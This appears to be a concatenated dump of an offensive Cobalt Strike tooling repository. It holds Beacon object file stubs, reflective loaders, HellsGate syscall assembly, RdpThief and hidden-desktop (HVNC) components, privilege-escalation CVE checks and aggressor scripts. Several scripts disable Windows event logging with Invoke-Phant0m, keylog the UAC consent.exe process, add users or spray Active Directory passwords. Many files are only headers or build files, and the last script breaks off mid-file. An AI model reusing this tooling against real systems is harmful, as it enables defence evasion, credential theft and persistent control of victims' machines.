outflank_stage1.task.base_bof_task import BaseBOFTask 2 | 3 | 4 | class PswBOF(BaseBOFTask): 5 | def __init__(self): 6 | super().__init__("psw", base_binary_name="Psw") 7 | self.parser.description = ( 8 | "Show Window titles from processes with active Windows." 9 | ) 10 | -------------------------------------------------------------------------------- /Loader/Titan Ldr/Peb.h: -------------------------------------------------------------------------------- 1 | /** 2 | * 3 | * Reflective Loader 4 | * 5 | * GuidePoint Security LLC 6 | * 7 | * Threat and Attack Simulation 8 | * 9 | **/ 10 | 11 | #pragma once 12 | 13 | /*! 14 | * 15 | * Purpose: 16 | * 17 | * Finds a module loaded in memory. 18 | * 19 | !*/ 20 | 21 | D_SEC( E ) PVOID PebGetModule( _In_ ULONG Hash ); 22 | -------------------------------------------------------------------------------- /Cobatl Strike/Smbinfo/SOURCE/Smbinfo.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | //NETAPI32 7 | typedef NET_API_STATUS(WINAPI *_NetWkstaGetInfo)( 8 | LMSTR servername, 9 | DWORD level, 10 | LPBYTE *bufptr 11 | ); 12 | 13 | typedef NET_API_STATUS(WINAPI *_NetApiBufferFree)( 14 | LPVOID Buffer 15 | ); 16 | -------------------------------------------------------------------------------- /Cobatl Strike/Webcam BOF/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /Cobatl Strike/Domaininfo/Domaininfo_bof.s1.py: -------------------------------------------------------------------------------- 1 | from outflank_stage1.task.base_bof_task import BaseBOFTask 2 | 3 | 4 | class DomainInfoBOF(BaseBOFTask): 5 | def __init__(self): 6 | super().__init__("Domaininfo") 7 | self.parser.description = ( 8 | "Using Active Directory Domain Services to enumerate domain information." 9 | ) 10 | -------------------------------------------------------------------------------- /Cobatl Strike/RDP Thief/RdpThief/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /Cobatl Strike/FortyNorthSecurity/Initial Access/Notifications/text_aggressor.cna: -------------------------------------------------------------------------------- 1 | on beacon_initial { 2 | local('$computer'); 3 | local('$internal'); 4 | $computer = beacon_info($1, "computer"); 5 | $internal = beacon_info($1, "internal"); 6 | exec("/root/cobaltstrike/emailme.py --ip " . $internal . " --computer '" . $computer . "'"); 7 | } 8 | -------------------------------------------------------------------------------- /Loader/HellLoader/HellsGate/HellsGate/HellsGate/hellsgate.asm: -------------------------------------------------------------------------------- 1 | 2 | .data 3 | wSystemCall DWORD 000h 4 | 5 | .code 6 | HellsGate PROC 7 | mov wSystemCall, 000h 8 | mov wSystemCall, ecx 9 | ret 10 | HellsGate ENDP 11 | 12 | HellDescent PROC 13 | mov r10, rcx 14 | mov eax, wSystemCall 15 | 16 | syscall 17 | ret 18 | HellDescent ENDP 19 | end 20 | -------------------------------------------------------------------------------- /Loader/Titan Ldr/Pe.h: -------------------------------------------------------------------------------- 1 | /** 2 | * 3 | * Reflective Loader 4 | * 5 | * GuidePoint Security LLC 6 | * 7 | * Threat and Attack Simulation 8 | * 9 | **/ 10 | 11 | #pragma once 12 | 13 | /*! 14 | * 15 | * Purpose: 16 | * 17 | * Searches for a export matching the specified hash. 18 | * 19 | !*/ 20 | 21 | D_SEC( E ) PVOID PeGetFuncEat( _In_ PVOID Image, _In_ ULONG Hash ); 22 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor CNA/JuickyPotato_DLL/JuicyPotato/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // MSFRottenPotato.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/client/asm/x64/start.asm: -------------------------------------------------------------------------------- 1 | ; https://github.com/SolomonSklash/netntlm/blob/master/asm/x64/start.asm 2 | [BITS 64] 3 | 4 | GLOBAL GetIp 5 | GLOBAL Leave 6 | 7 | [SEGMENT .text$F] 8 | 9 | GetIp: 10 | call get_ret_ptr 11 | 12 | get_ret_ptr: 13 | pop rax 14 | sub rax, 5 15 | ret 16 | 17 | Leave: 18 | db 'W', 'K', 'L', 'H', 'V', 'N', 'C' 19 | -------------------------------------------------------------------------------- /Cobatl Strike/Hell sHall/test/helperfunc.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | 4 | unsigned char* ReadFileToBuffer(const char* filename, size_t* out_size); 5 | unsigned char* ExtractBlob(const char* carrier_file, size_t* out_size); 6 | unsigned char* DecryptBlob(const unsigned char* blob, size_t blob_size, size_t* out_size); 7 | unsigned char* Decrypt(const char* carrier_file, size_t* out_size); 8 | 9 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor CNA/JuickyPotato_DLL/JuicyPotato/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /Cobatl Strike/Beaconator/scripts/scarecrow_helper.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | import sys 4 | import subprocess 5 | 6 | command = sys.argv[1] 7 | 8 | with subprocess.Popen(command, stdout=subprocess.PIPE, bufsize=1, universal_newlines=True, shell=True) as p: 9 | for b in p.stdout: 10 | print(b, end='') 11 | 12 | if p.returncode != 0: 13 | raise CalledProcessError(p.returncode, p.args) -------------------------------------------------------------------------------- /Cobalt Strike Win Exec/doc/build/secret.c: -------------------------------------------------------------------------------- 1 | 2 | int check_password(char* password) { 3 | char* actual = "oh no i haz been hax by a side channel attack!"; 4 | 5 | while (1) { 6 | if (*password == '\0' || *actual == '\0') { 7 | return *password == *actual; 8 | } 9 | 10 | if (*password != *actual) { 11 | return 0; 12 | } 13 | 14 | password++; 15 | actual++; 16 | } 17 | 18 | return 0; 19 | } -------------------------------------------------------------------------------- /Cobatl Strike/Erebus/modules/gather.cna: -------------------------------------------------------------------------------- 1 | #define functions 2 | 3 | 4 | #append menus 5 | 6 | menu "Gather"{ 7 | item "Process Detail"{ 8 | local('$bid'); 9 | $bid = $1; 10 | if ( -isadmin $bid['@'] ){ 11 | bshell($bid,"wmic process get caption,executablepath,commandline"); 12 | return; 13 | } 14 | } 15 | } -------------------------------------------------------------------------------- /Cobatl Strike/ForceLockScreen/forcelockscreen.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "forcelockscreen.h" 3 | #include "beacon.h" 4 | 5 | #pragma comment(lib, "User32.lib") 6 | 7 | int go() { 8 | 9 | USER32$LockWorkStation(); 10 | BeaconPrintf(CALLBACK_OUTPUT, "[+] Lock screen forced for current user session.\n"); 11 | 12 | return 0; 13 | } 14 | 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Cobatl Strike/Hell sHall/Hell'sHall/helperfunc.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | 4 | unsigned char* ReadFileToBuffer(const char* filename, size_t* out_size); 5 | unsigned char* ExtractBlob(const char* carrier_file, size_t* out_size); 6 | unsigned char* DecryptBlob(const unsigned char* blob, size_t blob_size, size_t* out_size); 7 | unsigned char* Decrypt(const char* carrier_file, size_t* out_size); 8 | 9 | -------------------------------------------------------------------------------- /Cobalt Strike Win Exec/cmake/build/secret.c: -------------------------------------------------------------------------------- 1 | 2 | int check_password(char* password) { 3 | char* actual = "oh no i haz been hax by a side channel attack!"; 4 | 5 | while (1) { 6 | if (*password == '\0' || *actual == '\0') { 7 | return *password == *actual; 8 | } 9 | 10 | if (*password != *actual) { 11 | return 0; 12 | } 13 | 14 | password++; 15 | actual++; 16 | } 17 | 18 | return 0; 19 | } -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/client/asm/x86/start.asm: -------------------------------------------------------------------------------- 1 | ; https://github.com/SolomonSklash/netntlm/blob/master/asm/x86/start.asm 2 | [BITS 32] 3 | 4 | GLOBAL _GetIp 5 | GLOBAL _Leave 6 | 7 | [SEGMENT .text$F] 8 | 9 | _GetIp: 10 | call _get_ret_ptr 11 | 12 | _get_ret_ptr: 13 | pop eax 14 | sub eax, 5 15 | ret 16 | 17 | _Leave: 18 | db 'W', 'K', 'L', 'H', 'V', 'N', 'C' 19 | -------------------------------------------------------------------------------- /Loader/AceLdr/src/asm/misc.asm: -------------------------------------------------------------------------------- 1 | [BITS 64] 2 | 3 | GLOBAL GetIp 4 | GLOBAL Stub 5 | 6 | 7 | [SECTION .text$C] 8 | 9 | Stub: 10 | dq 0 11 | dq 0 12 | dq 0 13 | 14 | 15 | [SECTION .text$F] 16 | 17 | GetIp: 18 | call get_ret_ptr 19 | 20 | get_ret_ptr: 21 | pop rax 22 | sub rax, 5 23 | ret 24 | 25 | Leave: 26 | db 'A', 'C', 'E', 'L', 'D', 'R' 27 | -------------------------------------------------------------------------------- /Cobatl Strike/StartWebClient/StartWebClient_bof.s1.py: -------------------------------------------------------------------------------- 1 | from typing import List, Tuple 2 | 3 | from outflank_stage1.task.base_bof_task import BaseBOFTask 4 | from outflank_stage1.task.enums import BOFArgumentEncoding 5 | 6 | 7 | class StartWebClientBOF(BaseBOFTask): 8 | def __init__(self): 9 | super().__init__("StartWebClient") 10 | self.parser.description = "Starting WebClient Service Programmatically." 11 | -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Artifact Kit/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "artifact64big" 3 | version = "0.1.0" 4 | edition = "2024" 5 | 6 | [dependencies] 7 | windows-sys = { version = "0.59", features = [ 8 | "Win32_Foundation", 9 | "Win32_System_Diagnostics_ToolHelp", 10 | "Win32_System_Memory", 11 | "Win32_System_Threading", 12 | ] } 13 | [build] 14 | rustflags = ["-C", "link-args=-Wl,--section=.rdata=.text"] 15 | -------------------------------------------------------------------------------- /Cobatl Strike/Elusive Mice/Makefile: -------------------------------------------------------------------------------- 1 | CC_x64 := x86_64-w64-mingw32-gcc 2 | CC_x86 := i686-w64-mingw32-gcc 3 | 4 | CFLAGS := $(CFLAGS) -O0 5 | CFLAGS := $(CFLAGS) -masm=intel -Wall -Wno-pointer-arith -w 6 | 7 | all: clean 8 | $(CC_x64) $(CFLAGS) -c src/elusiveMice.c -o bin/elusiveMice.x64.o 9 | $(CC_x86) $(CFLAGS) -c src/elusiveMice.c -o bin/elusiveMice.x86.o 10 | cp elusiveMice.cna bin 11 | 12 | clean: 13 | rm -f bin/*.o 14 | -------------------------------------------------------------------------------- /Cobatl Strike/p292/disableeventvwr.cna: -------------------------------------------------------------------------------- 1 | popup beacon_bottom { 2 | menu "Event Viewer Tools" { 3 | item "Disable Event Viewer"{ 4 | local('$bid'); 5 | foreach $bid ($1){ 6 | bpowershell_import($bid, script_resource("disableeventvwr/Invoke-Phant0m.ps1")); 7 | bpowershell($bid, "Invoke-Phant0m"); 8 | elog("Event Log Killed by " . mynick() . " on " . binfo("$bid", "computer")); 9 | } 10 | } 11 | } 12 | } -------------------------------------------------------------------------------- /Cobatl Strike/BOF Oxide/src/rust_bof.rs: -------------------------------------------------------------------------------- 1 | use crate::Beacon; 2 | use core::ffi::c_char; 3 | 4 | // This will be the main file we edit to write out BOFs. 5 | pub fn rust_bof(mut beacon: Beacon) { 6 | let str_arg = beacon.get_arg(); 7 | if str_arg.is_null() { 8 | beacon.output("Please provide a str:\"arg\""); 9 | } else { 10 | beacon.printf("Hello %s from rust bof\0", str_arg as *mut c_char); 11 | } 12 | } 13 | -------------------------------------------------------------------------------- /Cobatl Strike/BeLix/encrypt/utils.go: -------------------------------------------------------------------------------- 1 | package encrypt 2 | 3 | import ( 4 | "time" 5 | 6 | "golang.org/x/exp/rand" 7 | ) 8 | 9 | func RandomInt(min, max int) int { 10 | t := time.Now().UnixNano() 11 | rand.Seed(uint64(t)) 12 | return min + rand.Intn(max-min) 13 | } 14 | 15 | 16 | func RandomAESKey() []byte { 17 | key := make([]byte,16) 18 | _, err := rand.Read(key[:]) 19 | if err != nil { 20 | panic(err) 21 | } 22 | return key 23 | } -------------------------------------------------------------------------------- /Loader/AceLdr/bin/AceLdr.cna: -------------------------------------------------------------------------------- 1 | set BEACON_RDLL_GENERATE { 2 | $smpath = script_resource( "AceLdr.". $3 .".bin" ); 3 | $hnd = openf( $smpath ); 4 | $ldr = readb( $hnd, -1 ); 5 | closef( $hnd ); 6 | 7 | if ( strlen( $ldr ) == 0 ) { 8 | return $null; 9 | }; 10 | warn("Loading custom user defined reflective loader from: " . $smpath); 11 | 12 | return setup_transformations($ldr . $2, $3); 13 | }; 14 | -------------------------------------------------------------------------------- /threatexpress/beacon_webview/beacons.csv: -------------------------------------------------------------------------------- 1 | id,pid,pbid,user,os,ver,host,computer,charset,internal,external,port,session,last,lastf,is64,barch,alive,note 2 | 26239,8284,27265,admin,Windows,10.0,172.30.149.81,WIN10,windows-1252,172.30.149.81,172.30.149.81 ⚯⚯,,beacon,848227,14m,1,x86,true,NEW; x86; SMB parent 8284 3 | 27265,4272,,admin,Windows,10.0,172.30.149.81,WIN10,windows-1252,172.30.149.81,172.16.214.128,,beacon,503,503ms,1,x86,true,NEW; x86; sleep 60 20 4 | -------------------------------------------------------------------------------- /Cobatl Strike/BOF CredUI/credui.cna: -------------------------------------------------------------------------------- 1 | alias credui { 2 | 3 | # figure out the arch of this session 4 | $barch = barch($1); 5 | 6 | # read in the right BOF file 7 | $handle = openf(script_resource("credui. $+ $barch $+ .o")); 8 | $data = readb($handle, -1); 9 | closef($handle); 10 | 11 | # pack our arguments 12 | $args = bof_pack($1, "ZZ", $2, $3); 13 | 14 | # execute it 15 | beacon_inline_execute($1, $data, "launch", $args); 16 | } -------------------------------------------------------------------------------- /Cobatl Strike/bluescreenofjeff/ps-window-alias.cna: -------------------------------------------------------------------------------- 1 | #author bluescreenofjeff 2 | 3 | #alias for "pspane" to open the process browser pane for the current Beacon 4 | 5 | #register help 6 | beacon_command_register("pspane", "open process browser pane", 7 | "Synopsis: pspane \n\n" . 8 | "Open the process browser pane for the current Beacon."); 9 | 10 | #setting the alias 11 | alias pspane { 12 | binput($1,"ps"); 13 | openProcessBrowser($1); 14 | } 15 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 3/ps-window-alias.cna: -------------------------------------------------------------------------------- 1 | #author bluescreenofjeff 2 | 3 | #alias for "pspane" to open the process browser pane for the current Beacon 4 | 5 | #register help 6 | beacon_command_register("pspane", "open process browser pane", 7 | "Synopsis: pspane \n\n" . 8 | "Open the process browser pane for the current Beacon."); 9 | 10 | #setting the alias 11 | alias pspane { 12 | binput($1,"ps"); 13 | openProcessBrowser($1); 14 | } 15 | -------------------------------------------------------------------------------- /Cobatl Strike/Winver/Winver_bof.s1.py: -------------------------------------------------------------------------------- 1 | from typing import List, Tuple 2 | 3 | from outflank_stage1.task.base_bof_task import BaseBOFTask 4 | from outflank_stage1.task.enums import BOFArgumentEncoding 5 | 6 | 7 | class WinverBOF(BaseBOFTask): 8 | def __init__(self): 9 | super().__init__("Winver") 10 | self.parser.description = "Display the version of Windows that is running, the build number and patch release (Update Build Revision)." 11 | -------------------------------------------------------------------------------- /Cobatl Strike/killswitch GUI/cs-install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # adapted from @christruncer 3 | # just and example 4 | wget https://www.cobaltstrike.com/downloads/a24a41fcae308883d74f3b57e36e5bbb/cobaltstrike-trial.tgz 5 | tar zxvf cobaltstrike-trial.tgz 6 | sudo apt-get update -y 7 | sudo apt-get install build-essential -y 8 | sudo add-apt-repository ppa:webupd8team/java -y 9 | sudo apt-get update -y 10 | sudo apt-get install oracle-java7-installer -y 11 | -------------------------------------------------------------------------------- /Und3rf10w/Pushover/pushover-cs: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [[ $# -gt 0 ]]; then 3 | title=$1 4 | shift 5 | a=$@ 6 | else 7 | read a; 8 | fi 9 | 10 | pushover () { 11 | curl -s -F "token=$1" -F "user=$2" -F "title=$3" -F "message=$a" https://api.pushover.net/1/messages.json 12 | } 13 | 14 | # sample pushover user config 15 | # add a line for each user you wish to receive a message 16 | # pushover "$title" "$a" #sample_username1 17 | -------------------------------------------------------------------------------- /Cobatl Strike/C2 Crash/dict/username.txt: -------------------------------------------------------------------------------- 1 | AliceWang 2 | BobLi 3 | CharlieZhang 4 | DavidChen 5 | EvaLiu 6 | FrankWu 7 | GraceYang 8 | HenryLin 9 | IvyHuang 10 | JackieZhao 11 | KevinSun 12 | LindaGuo 13 | MichaelXu 14 | NancyHe 15 | OscarFeng 16 | PatriciaGao 17 | QuincyTang 18 | RachelDeng 19 | StevenMa 20 | TinaShen 21 | VictorCai 22 | WendyQin 23 | XavierWu 24 | YvonneJiang 25 | ZacharyCheng 26 | LilyWu 27 | JasonLiang 28 | AmyZhou 29 | EricHuang 30 | SophieLin -------------------------------------------------------------------------------- /Loader/Titan Ldr/Hash.h: -------------------------------------------------------------------------------- 1 | /** 2 | * 3 | * Reflective Loader 4 | * 5 | * GuidePoint Security LLC 6 | * 7 | * Threat and Attack Simulation 8 | * 9 | **/ 10 | 11 | #pragma once 12 | 13 | /*! 14 | * 15 | * Purpose: 16 | * 17 | * Creates a hash summary of the input buffer. 18 | * If a length is not provided, it assumes it 19 | * is NULL terminated. 20 | * 21 | !*/ 22 | 23 | D_SEC( E ) UINT32 HashString( _In_ PVOID Buffer, _In_opt_ ULONG Length ); 24 | -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/client/util.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | SECTION( E ) UINT32 HashString( PVOID buffer, ULONG size ); 4 | SECTION( E ) PVOID FindModule( ULONG hash, PPEB peb ); 5 | SECTION( E ) PVOID FindFunction( PVOID image, ULONG hash ); 6 | SECTION( E ) SIZE_T strlenA( PCHAR str ); 7 | SECTION( E ) PCHAR strcpyA( PCHAR dst, PCHAR src ); 8 | SECTION( E ) PCHAR strcatA( PCHAR dst, PCHAR src ); 9 | SECTION( E ) INT strcmpA( PCHAR String1, PCHAR String2 ); 10 | -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/client/types.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | typedef HDC *PHDC; 4 | typedef HBITMAP *PHBITMAP; 5 | typedef CLSID *PCLSID; 6 | typedef GpBitmap GPBITMAP; 7 | typedef GPBITMAP *PGPBITMAP; 8 | typedef IStream *PISTREAM; 9 | typedef EncoderParameters ENCODERPRM; 10 | 11 | typedef BOOL ( CALLBACK* PICWNDENUMPROC )(HWND, LPARAM, PAPI ); 12 | 13 | typedef struct 14 | { 15 | HDC hDc; 16 | HDC hDcScreen; 17 | } WINDOWS, *PWINDOWS; 18 | -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/server/common.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #include "../shared/native.h" 9 | #include "../shared/config.h" 10 | 11 | #define MAX_CLIENTS 256 12 | #define CLASS "HiddenDesktop_ControlWindow" 13 | #define WINDOW_TITLE "HVNC Operator UI" 14 | #define CONSOLE_TITLE "HVNC Server" 15 | #define PORT 1337 16 | -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/server/main.c: -------------------------------------------------------------------------------- 1 | #include "common.h" 2 | #include "controlwindow.h" 3 | #include "server.h" 4 | 5 | int main( void ) 6 | { 7 | HANDLE handleConsole = GetStdHandle( STD_OUTPUT_HANDLE ); 8 | SetConsoleTitleA( CONSOLE_TITLE ); 9 | printf( "[+] Starting HVNC Server on Port: %d\n", PORT ); 10 | 11 | StartServer( PORT ); 12 | getchar(); 13 | 14 | CloseHandle( handleConsole ); 15 | return 0; 16 | }; 17 | -------------------------------------------------------------------------------- /VYSEC/CACTUSTORCH/banner.txt: -------------------------------------------------------------------------------- 1 | ███████╗██████╗ ██╗ ██╗████████╗██╗ ██╗██████╗ █████╗ 2 | ██╔════╝██╔══██╗██║ ██║╚══██╔══╝██║ ██║██╔══██╗██╔══██╗ 3 | ███████╗██████╔╝██║ ██║ ██║ ██║ ██║██████╔╝███████║ 4 | ╚════██║██╔═══╝ ██║ ██║ ██║ ╚██╗ ██╔╝██╔══██╗██╔══██║ 5 | ███████║██║ ███████╗██║ ██║ ╚████╔╝ ██████╔╝██║ ██║ 6 | ╚══════╝╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚═╝ 7 | -------------------------------------------------------------------------------- /Cobatl Strike/Add User BOF/Makefile: -------------------------------------------------------------------------------- 1 | BOF := AddUser-Bof 2 | CC_x64 := x86_64-w64-mingw32-gcc 3 | CC_x86 := i686-w64-mingw32-gcc 4 | STRIP_x64 := x86_64-w64-mingw32-strip 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | 7 | all: 8 | $(CC_x64) -o dist/$(BOF).x64.o -c AddUser-Bof.c 9 | $(STRIP_x64) --strip-unneeded dist/$(BOF).x64.o 10 | $(CC_x86) -o dist/$(BOF).x86.o -c AddUser-Bof.c 11 | $(STRIP_x86) --strip-unneeded dist/$(BOF).x86.o 12 | 13 | clean: 14 | rm -f dist/*.o 15 | -------------------------------------------------------------------------------- /Loader/Cobalt Strike Crystal Kit/udrl/Makefile: -------------------------------------------------------------------------------- 1 | CC_64=x86_64-w64-mingw32-gcc 2 | 3 | all: bin/loader.x64.o 4 | 5 | bin: 6 | mkdir bin 7 | 8 | bin/loader.x64.o: bin 9 | $(CC_64) -DWIN_X64 -shared -Wall -Wno-pointer-arith -c src/loader.c -o bin/loader.x64.o 10 | $(CC_64) -DWIN_X64 -shared -Wall -Wno-pointer-arith -c src/proxy.c -o bin/proxy.x64.o 11 | $(CC_64) -DWIN_X64 -shared -Wall -Wno-pointer-arith -c src/hook.c -o bin/hook.x64.o 12 | 13 | clean: 14 | rm -f bin/* 15 | -------------------------------------------------------------------------------- /Cobatl Strike/bluescreenofjeff/checkin_jobs_context.cna: -------------------------------------------------------------------------------- 1 | #author bluescreenofjeff 2 | 3 | #adds context menu options to run "checkin" or "jobs" on Beacon session to help detect stale beacons in bulk 4 | 5 | 6 | #context menu building 7 | popup beacon_bottom { 8 | menu "Checkin"{ 9 | item 'Run "checkin"' { 10 | binput($1, "checkin"); 11 | bcheckin($1); 12 | } 13 | item 'Run "jobs"' { 14 | binput($1, "jobs"); 15 | bjobs($1); 16 | } 17 | } 18 | } 19 | 20 | -------------------------------------------------------------------------------- /Loader/Cobalt Strike Crystal Kit/postex-udrl/Makefile: -------------------------------------------------------------------------------- 1 | CC_64=x86_64-w64-mingw32-gcc 2 | 3 | all: bin/loader.x64.o 4 | 5 | bin: 6 | mkdir bin 7 | 8 | bin/loader.x64.o: bin 9 | $(CC_64) -DWIN_X64 -shared -Wall -Wno-pointer-arith -c src/loader.c -o bin/loader.x64.o 10 | $(CC_64) -DWIN_X64 -shared -Wall -Wno-pointer-arith -c src/proxy.c -o bin/proxy.x64.o 11 | $(CC_64) -DWIN_X64 -shared -Wall -Wno-pointer-arith -c src/hook.c -o bin/hook.x64.o 12 | 13 | clean: 14 | rm -f bin/* 15 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 1/checkin_jobs_context.cna: -------------------------------------------------------------------------------- 1 | #author bluescreenofjeff 2 | 3 | #adds context menu options to run "checkin" or "jobs" on Beacon session to help detect stale beacons in bulk 4 | 5 | 6 | #context menu building 7 | popup beacon_bottom { 8 | menu "Checkin"{ 9 | item 'Run "checkin"' { 10 | binput($1, "checkin"); 11 | bcheckin($1); 12 | } 13 | item 'Run "jobs"' { 14 | binput($1, "jobs"); 15 | bjobs($1); 16 | } 17 | } 18 | } 19 | 20 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 3/checkin_jobs_context.cna: -------------------------------------------------------------------------------- 1 | #author bluescreenofjeff 2 | 3 | #adds context menu options to run "checkin" or "jobs" on Beacon session to help detect stale beacons in bulk 4 | 5 | 6 | #context menu building 7 | popup beacon_bottom { 8 | menu "Checkin"{ 9 | item 'Run "checkin"' { 10 | binput($1, "checkin"); 11 | bcheckin($1); 12 | } 13 | item 'Run "jobs"' { 14 | binput($1, "jobs"); 15 | bjobs($1); 16 | } 17 | } 18 | } 19 | 20 | -------------------------------------------------------------------------------- /Cobatl Strike/BOF SprayAD/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | BOF := SprayAD 2 | CC_x64 := x86_64-w64-mingw32-gcc 3 | STRIP_x64 := x86_64-w64-mingw32-strip 4 | CC_x86 := i686-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | 7 | all: 8 | $(CC_x64) -o ../$(BOF).x64.o -c $(BOF).c 9 | $(STRIP_x64) --strip-unneeded ../$(BOF).x64.o 10 | $(CC_x86) -o ../$(BOF).x86.o -c $(BOF).c 11 | $(STRIP_x86) --strip-unneeded ../$(BOF).x86.o 12 | 13 | clean: 14 | rm ../$(BOF).x64.o 15 | rm ../$(BOF).x86.o 16 | -------------------------------------------------------------------------------- /Cobatl Strike/Hell sHall/test/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by Resource.rc 4 | 5 | // Next default values for new objects 6 | // 7 | #ifdef APSTUDIO_INVOKED 8 | #ifndef APSTUDIO_READONLY_SYMBOLS 9 | #define _APS_NEXT_RESOURCE_VALUE 101 10 | #define _APS_NEXT_COMMAND_VALUE 40001 11 | #define _APS_NEXT_CONTROL_VALUE 1001 12 | #define _APS_NEXT_SYMED_VALUE 101 13 | #endif 14 | #endif 15 | -------------------------------------------------------------------------------- /Cobatl Strike/Dazzle UP/dazzleUP/headers/exploit_checks/CVE_2019_0836.h: -------------------------------------------------------------------------------- 1 | //https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0836 2 | void CVE_2019_0836() { 3 | int osRID = osReleaseId(); 4 | 5 | if (osRID == 1809) { 6 | if (std::find(installedUpdates.begin(), installedUpdates.end(), "4493509") == installedUpdates.end()) { 7 | std::cout << "\n\t [!] Vulnerable for CVE-2019-0836 Windows Elevation of Privilege Vulnerability" << "\n"; 8 | } 9 | } 10 | } -------------------------------------------------------------------------------- /Cobatl Strike/Dazzle UP/dazzleUP/headers/exploit_checks/CVE_2019_0841.h: -------------------------------------------------------------------------------- 1 | //https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0841 2 | void CVE_2019_0841() { 3 | int osRID = osReleaseId(); 4 | 5 | if (osRID == 1809) { 6 | if (std::find(installedUpdates.begin(), installedUpdates.end(), "4493509") == installedUpdates.end()) { 7 | std::cout << "\n\t [!] Vulnerable for CVE-2019-0841 Windows Elevation of Privilege Vulnerability" << "\n"; 8 | } 9 | } 10 | } -------------------------------------------------------------------------------- /Cobatl Strike/Hell sHall/Hell'sHall/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by Resource.rc 4 | 5 | // Next default values for new objects 6 | // 7 | #ifdef APSTUDIO_INVOKED 8 | #ifndef APSTUDIO_READONLY_SYMBOLS 9 | #define _APS_NEXT_RESOURCE_VALUE 101 10 | #define _APS_NEXT_COMMAND_VALUE 40001 11 | #define _APS_NEXT_CONTROL_VALUE 1001 12 | #define _APS_NEXT_SYMED_VALUE 101 13 | #endif 14 | #endif 15 | -------------------------------------------------------------------------------- /Loader/BOF Loader/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "bof-loader" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | [dependencies] 8 | encoding = "0.2.33" 9 | [dependencies.windows-sys] 10 | version = "0.52" 11 | features = [ 12 | "Win32_Foundation", 13 | "Win32_Security", 14 | "Win32_System_Memory", 15 | "Win32_System_Threading", 16 | "Win32_System_LibraryLoader", 17 | ] 18 | -------------------------------------------------------------------------------- /Cobatl Strike/RDP Thief/RdpThief/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files 12 | #include 13 | 14 | 15 | 16 | // reference additional headers your program requires here 17 | -------------------------------------------------------------------------------- /VYSEC/auto-keylog-consent.cna: -------------------------------------------------------------------------------- 1 | 2 | sub keylognow { 3 | bps($1, lambda({ 4 | local('$pid $name $entry'); 5 | foreach $entry (split("\n", $2)) { 6 | ($name, $null, $pid, $arch) = split("\\s+", $entry); 7 | if ($name eq "consent.exe") { 8 | [$callback: $1, $pid, $arch]; 9 | } 10 | } 11 | }, $callback => $2)); 12 | } 13 | 14 | alias keylog-consent { 15 | btask($1, "Tasked Beacon to find consent.exe and keylog it"); 16 | 